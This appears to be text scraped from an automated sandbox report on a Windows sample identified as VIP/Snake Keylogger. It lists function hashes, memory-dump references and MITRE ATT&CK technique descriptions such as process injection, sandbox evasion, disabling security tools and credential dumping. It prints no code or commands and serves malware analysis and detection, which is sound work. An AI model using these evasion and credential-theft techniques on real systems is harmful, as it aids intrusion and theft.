API String ID:
Opcode ID: 1720188facd2f4b658e8d191c0dba00114170fb78219ce31d384db67ae03875e
Instruction ID: 8ff43df70157f612bcfeadd9c23081cc88c24be7c112a3177b7e40c7bf4ed387
Opcode Fuzzy Hash: 1720188facd2f4b658e8d191c0dba00114170fb78219ce31d384db67ae03875e
Instruction Fuzzy Hash: 0BF0F4353001156FDF191EA99854A7FBB9BEBCC374B14842DFA09C7354DE65CC4287A1

Function 01399C29 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1390000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95d9ad6be9a8dbb92a8271b572e5f2350c66c7bb353410226db95d1a41e7d43f
Instruction ID: 785563e2b43500f91f705b8e60a848d1d4bace9652b26db85d1d18310e438677
Opcode Fuzzy Hash: 95d9ad6be9a8dbb92a8271b572e5f2350c66c7bb353410226db95d1a41e7d43f
Instruction Fuzzy Hash: AEF05E32A001189FCF11DF69D844BEABBF5EBC8329F10C03AE908C7214D7324A158B90

Function 0139AF5B Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1390000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba852f6dc9da284d126ecae0091a67771839e1cf8ca2fea3e030b2f96f60caa4
Instruction ID: 0c99aa6a123a00325b0b609c4125e8593bed768a33b6267eb2f8c773348d5778
Opcode Fuzzy Hash: ba852f6dc9da284d126ecae0091a67771839e1cf8ca2fea3e030b2f96f60caa4
Instruction Fuzzy Hash: BAF03036644244EFCF01CF94EC40ACDBBB2FF8C321F184096EA11AB2A1C2319815CB61

Function 01396739 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1390000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5eda2273a90a768e9631957c75590c9e9bedb4339132b4d034c2d92f86e1c0d
Instruction ID: 5ce13b81ce9034e42e3d0d1a009ca29025f04b6f86c64495430706d61c1748f2
Opcode Fuzzy Hash: a5eda2273a90a768e9631957c75590c9e9bedb4339132b4d034c2d92f86e1c0d
Instruction Fuzzy Hash: 1AE0CD3000D3878FCB13A779EC544443B7AEE5211470480A9D1048E1D6DE7D1887C7D0

Function 013928B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1390000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cd3d3f6d5f182ac9c60e241103460b16357eab618f103361a3b8e22587041cf
Instruction ID: 147ee78828227962921ec1eba055844c63657c25adc41008e53666b5b6430e1e
Opcode Fuzzy Hash: 7cd3d3f6d5f182ac9c60e241103460b16357eab618f103361a3b8e22587041cf
Instruction Fuzzy Hash: C1D01732E2126B968B00AAA5EC048EEB738EE96661B948626D52437140EB70665986A1

Function 013928AB Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1390000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4f6a14d0918c00685bedf2c69b5833efcd0c8eaf6aed19e34774882e70e33d0
Instruction ID: 26cdf523e6d73df81e7477b47efd8c02aacce24fd13f72a27aa2ad77ed72bb3b
Opcode Fuzzy Hash: b4f6a14d0918c00685bedf2c69b5833efcd0c8eaf6aed19e34774882e70e33d0
Instruction Fuzzy Hash: 01D01235E2122786CB01EBB1AD410EEB334AE95221B588626D52936150EB30665986D1

Function 0139D6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1390000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40eb162ad628d66099252c71cad0f7b5767f52108614e1a63fe7ac124d661043
Instruction ID: 2fb1769cc0d7c649529f04d67eba65e8939d60929893032326d3b31a286de70f
Opcode Fuzzy Hash: 40eb162ad628d66099252c71cad0f7b5767f52108614e1a63fe7ac124d661043
Instruction Fuzzy Hash: 67D04235E0410DCBCF30DFA9E4894DDBB71EB49325B10946AD929A3651D63054558F51

Function 0139AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1390000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0a7e90c79ff34da66eaeae6c002b1c9f3470219d6edd77efc12aa6507ecd116
Instruction ID: d918a14b330bb4828339b8b35cf6fa33da131cc93bdf804cb49304c052accf7b
Opcode Fuzzy Hash: d0a7e90c79ff34da66eaeae6c002b1c9f3470219d6edd77efc12aa6507ecd116
Instruction Fuzzy Hash: 5ED0673BB00008DFCB149F99E8809DDF776FB98261B04C116F925A3264C6319965DB61

Function 01396748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1390000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f47ee988ac3e657eb5c7d49c41ad027ed6b2e835bc072a20251e0d3ec13d3596
Instruction ID: 7cd3f85b548ea9f5cb077e8b03db59b38ea0afbc6a9d0d3000ca4753e2e8d278
Opcode Fuzzy Hash: f47ee988ac3e657eb5c7d49c41ad027ed6b2e835bc072a20251e0d3ec13d3596
Instruction Fuzzy Hash: 5EC0123040430B8ED515F766ED44555772EE6E0204740C51491054A689DE7D5DDB4794

Non-executed Functions

Function 05560040 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5560000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 917750c642fe896f8b983f82ba61ae7f139c26a90a2f7be080f13dfd379bea90
Instruction ID: 08ff2912de3aca161a6a6b1da5e662fd799bd379f880d9d30a783cce9961c431
Opcode Fuzzy Hash: 917750c642fe896f8b983f82ba61ae7f139c26a90a2f7be080f13dfd379bea90
Instruction Fuzzy Hash: EB529A74E01269CFDB64DF69C884B9EBBB2BF89305F1081E9D409A7264DB359E81CF50

Function 0556D550 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5560000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90f8598c20d2d1fa7b5d956d9c2121238c88e0aea01c35ee35ad23bb771ee314
Instruction ID: 29ed473698ad2fdcb222d7d9bc5d699a9b2088609be421c3d7290b9bc1fd6501
Opcode Fuzzy Hash: 90f8598c20d2d1fa7b5d956d9c2121238c88e0aea01c35ee35ad23bb771ee314
Instruction Fuzzy Hash: 6BC1AE74E01259CFDB64DFA5C984B9DBBB2BF89300F1080A9D809AB355DB359E81CF51

Function 0556D9A8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5560000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8866fd18f8f6f2409c12c85ff20460ad8d8d74dfdd4d4d5db8b244770c3ac0e6
Instruction ID: b4752fe0b915c6435a9779132a1fcb82eac6d35f1aa538a03301a436fadd46c8
Opcode Fuzzy Hash: 8866fd18f8f6f2409c12c85ff20460ad8d8d74dfdd4d4d5db8b244770c3ac0e6
Instruction Fuzzy Hash: 69C18D74E01259CFDB54DFA5C984B9DBBB2BF89300F1081AAD809AB355DB359E81CF50

Function 0556F810 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5560000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc124e552e4d0507aa204d4c09e59f76e5bfd280c38911feaa9e02591a31d104
Instruction ID: f5789de7f1cc675cdf667b6a098362d5aa0c7061bbce77fec70ee83c7fa52c2d
Opcode Fuzzy Hash: cc124e552e4d0507aa204d4c09e59f76e5bfd280c38911feaa9e02591a31d104
Instruction Fuzzy Hash: D6C1BE78E01259CFDB14DFA5C994B9DBBB2BF89300F2080A9D809AB355DB359E81CF50

Function 0556D0F8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5560000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68f7153c772007e51830a13b01d81437c0b2f6b68df2580080f8df9db45de64d
Instruction ID: 298532c309bab5a19002ed067e9ee02f09f08944fd6c0ea9d82ba16ff69786ac
Opcode Fuzzy Hash: 68f7153c772007e51830a13b01d81437c0b2f6b68df2580080f8df9db45de64d
Instruction Fuzzy Hash: 7EC19E74E01259CFDB54DFA5C984B9DBBB2BF89300F1081A9D809AB355DB359E81CF50

Function 0556CCA0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5560000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb4ece6f1a93ff82fe3220364f8f95a152e125b15128bb72f088fea69e49dfac
Instruction ID: a826ca053a39be4f52b4169b3a13136d91e49af46ed298381d76e4e0ba0233b2
Opcode Fuzzy Hash: cb4ece6f1a93ff82fe3220364f8f95a152e125b15128bb72f088fea69e49dfac
Instruction Fuzzy Hash: 78C19E74E01259CFDB64DFA5C944B9DBBB2BF89300F1081A9D809AB355DB359E81CF50

Function 0556EF60 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5560000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c3f65f853a9ed85399884cfa02cdf1d287a8e22dc6d8ee3a0bacdeab23cea87
Instruction ID: 17dc1be00b635a434fc4836dbbbd20f276ac3e084d67ecdffb53e4bf838e6445
Opcode Fuzzy Hash: 0c3f65f853a9ed85399884cfa02cdf1d287a8e22dc6d8ee3a0bacdeab23cea87
Instruction Fuzzy Hash: EAC1AD74E01259CFDB54DFA5D984B9DBBB2BF89300F2080AAD809AB355DB359E81CF50

Function 0556EB08 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5560000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6463cafdf226f9f1d413b59d3d281624db3a67a86d6079cae8deeaa7969a4a7
Instruction ID: 6923fe5791e6e9e71a6a6343ce99c0bffea63897d6b65d49ac712d31b6404904
Opcode Fuzzy Hash: a6463cafdf226f9f1d413b59d3d281624db3a67a86d6079cae8deeaa7969a4a7
Instruction Fuzzy Hash: 5DC19E78E01259CFDB24DFA5C944B9DBBB2BF89300F1081A9D809AB355DB359E85CF50

Function 0556F3B8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5560000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9824db90d739afee713a65c89ebccdb244855e6ee5c1c1e0e872a73ea1287363
Instruction ID: c83386cca8119e8717c4567a12fdfe769a7560b4b3b236999e3b0461c5371076
Opcode Fuzzy Hash: 9824db90d739afee713a65c89ebccdb244855e6ee5c1c1e0e872a73ea1287363
Instruction Fuzzy Hash: 38C19D74E01259CFDB14DFA5D984B9DBBB2BF89300F2080AAD809AB355DB359E81CF51

Function 0556E258 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5560000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb140b433a868a3ef4b9b6a0bafc841962149169adb462ceb636077bfdb01585
Instruction ID: 4696fc8d8af76f5abc57133e61152805183c392523c9ab9c1cde14dc44ef7846
Opcode Fuzzy Hash: cb140b433a868a3ef4b9b6a0bafc841962149169adb462ceb636077bfdb01585
Instruction Fuzzy Hash: 6FC19E78E01259CFDB54DFA5C984B9DBBB2BF89300F2081A9D809AB355DB359E81CF50

Function 0556DE00 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5560000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca181e353be3583a7614b01fe36f1828ce23dad28c740811789b4ef9d17c2281
Instruction ID: dac786c03a2529f57956ed0ca2ed34441ec2c52e0b2696f9154cfe3fc7c5d727
Opcode Fuzzy Hash: ca181e353be3583a7614b01fe36f1828ce23dad28c740811789b4ef9d17c2281
Instruction Fuzzy Hash: FDC18E78E01259CFDB54DFA5C984B9DBBB2BF89300F1081AAD809AB355DB359E81CF50

Function 0556E6B0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5560000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1134b9d8cd93c9f9420bf4c9ecdc3584995a4dc3752e7f2f80de866069ae5fb
Instruction ID: 281cce370c8ab256e1eb82465def52f5da428fb97333b9a9c3242a34accf2cf4
Opcode Fuzzy Hash: b1134b9d8cd93c9f9420bf4c9ecdc3584995a4dc3752e7f2f80de866069ae5fb
Instruction Fuzzy Hash: D2C19E78E01259CFDB14DFA5C984B9DBBB2BF89300F1081A9D809AB355DB359E85CF50

Function 05560673 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5560000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08952dc34c93879aa1339a24694e05af091b79e1c9298f701fde59a1e5558dea
Instruction ID: 2398fdba489def781abd8392c3d72091fe46057cec8fa29b24a8c2318ac2a11f
Opcode Fuzzy Hash: 08952dc34c93879aa1339a24694e05af091b79e1c9298f701fde59a1e5558dea
Instruction Fuzzy Hash: 64A1AC74A01268CFDB64DF24C984B9ABBB2BF89304F1085E9D40EA7254DB319EC1CF51

Function 0139F2C0 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1390000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a448a81cf8d181d66897edc6b08dee7e9a641d96b11a050c5e16d4bc6830deb7
Instruction ID: 7b9f737e9d5ce6660f48fe84ce7b60968b888d432c3206597a1200da8f50ac3e
Opcode Fuzzy Hash: a448a81cf8d181d66897edc6b08dee7e9a641d96b11a050c5e16d4bc6830deb7
Instruction Fuzzy Hash: 51512670D01209DBEF14EFA9D5847EDBBB6FB89308F14D129D404BB294DB799881CB54

Function 0139F4AC Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1390000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d514016c81021b5ffd1e92c3f16fcbc9e02be507758150d50bad2949c821350f
Instruction ID: c4f15033a873f89d52dc85515a6d13e889757920a8fc5a51c4117cbe93a1000c
Opcode Fuzzy Hash: d514016c81021b5ffd1e92c3f16fcbc9e02be507758150d50bad2949c821350f
Instruction Fuzzy Hash: F0510070D01209DBEF10EFA9D584BEDBBBAFB49318F249169D419BB294C7399881CF50

Function 05560853 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5560000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36248c9e29a47b1c1b89fbdee2d7df0abbc6bd3bf67040bad226c8c8ea2a6b7f
Instruction ID: e67d81f9ccae8e08cb194748e77a996fc4d0fb6fa8179ea0e39db2df458cefb8
Opcode Fuzzy Hash: 36248c9e29a47b1c1b89fbdee2d7df0abbc6bd3bf67040bad226c8c8ea2a6b7f
Instruction Fuzzy Hash: 3B519E74A01229CFCB65DF24C994BAAB7B2FB4A305F5085E9D40AA7354CB329E81CF50

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report _Company.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
_Company.exe

Function 06179680 Relevance: 1.9, APIs: 1, Instructions: 396
COMMON

Function 0535BF70 Relevance: 1.9, Strings: 1, Instructions: 615
COMMON

Function 0128D3D8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 0128AD48 Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Function 0535AB94 Relevance: 1.6, APIs: 1, Instructions: 140
processCOMMON

Function 0535CA96 Relevance: 1.6, APIs: 1, Instructions: 139
processCOMMON

